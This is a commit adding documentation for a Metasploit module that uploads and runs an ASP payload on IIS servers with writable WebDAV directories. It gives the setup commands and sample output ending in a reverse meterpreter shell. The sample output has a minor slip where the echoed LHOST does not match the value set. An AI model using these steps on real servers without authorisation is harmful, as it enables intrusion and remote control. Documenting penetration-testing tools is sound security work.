Land rapid7#8180 docs for iis_webdav_upload_asp

Author: h00die

documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md

@@ -0,0 +1,49 @@
+## Description
+
+This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request. 
+
+**IMPORTANT:** The target IIS machine must meet these conditions to be considered as exploitable:
+
+1. It allows 'Script resource access'.
+2. It allows Read and Write permission.
+3. It supports ASP.
+
+## WebDAV
+
+Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol (HTTP) that allows clients to perform remote Web content authoring operations. WebDAV is defined in RFC 4918 by a working group of the Internet Engineering Task Force.
+
+## Verification Steps
+
+1. Do: ```use exploit/windows/iis/iis_webdav_upload_asp```
+2. Do: ```set payload windows/meterpreter/reverse_tcp```
+2. Do: ```set LHOST [IP]```
+3. Do: ```set RHOST [IP]```
+3. Do: ```set PATH / [PATH]```
+4. Do: ```run```
+
+## Sample Output
+
+```
+msf > use exploit/windows/iis/iis_webdav_upload_asp
+msf exploit(iis_webdav_upload_asp) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(iis_webdav_upload_asp) > set RHOST 172.16.176.54
+RHOST => 172.16.176.54
+msf exploit(iis_webdav_upload_asp) > set LHOST 172.16.176.56
+LHOST => 172.16.176.54
+msf exploit(iis_webdav_upload_asp) > set path /upload/test.asp
+path => /upload/test.asp
+msf exploit(iis_webdav_upload_asp) > exploit
+
+[*] Started reverse handler on 172.16.176.56:4444
+[*] Uploading 613830 bytes to /upload/test.txt...
+[*] Moving /upload/test.txt to /upload/test.asp...
+[*] Executing /upload/test.asp...
+[*] Sending stage (770048 bytes) to 172.16.176.54
+[*] Deleting /upload/test.asp, this doesn't always work...
+[!] Deletion failed on /upload/test.asp [403 Forbidden]
+
+meterpreter > getuid
+Server username: JUAN-C0DE875735\IWAM_JUAN-C0DE875735
+meterpreter >
+```